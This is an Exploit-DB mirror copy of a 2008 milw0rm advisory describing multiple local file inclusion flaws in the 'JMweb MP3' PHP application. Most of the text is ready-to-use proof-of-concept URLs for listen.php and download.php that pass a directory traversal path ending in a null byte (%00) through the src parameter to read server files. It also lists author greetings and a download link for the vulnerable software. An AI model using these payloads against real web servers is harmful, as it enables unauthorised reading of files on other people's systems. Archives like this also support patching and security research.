exploit-db-mirror/exploits/php/webapps/6669.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

34 lines
No EOL
1 KiB
Text

#################################################################################################
[+] JMweb MP3 (src) Multiple Local File Inclusion
[+] Discovered By SirGod
[+] wWw.MorTal-TeaM.OrG
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke,Codex
##################################################################################################
# Script Homepage:
# http://www.jesse-web.co.cc //
[+] Download : http://rapidshare.com/files/138968587/jmweb_audiosearch.zip
[+] Local File Inclusion
Example 1 :
http://[target]/[path]/listen.php?src=[Local File]%00
PoC 1 :
http://127.0.0.1/path/listen.php?src=../../../../autoexec.bat%00
Example 2 :
http://[target]/[path]/download.php?src=[Local File]%00
PoC 2 :
http://127.0.0.1/path/download.php?src=../../../../autoexec.bat%00
##################################################################################################
# milw0rm.com [2008-10-04]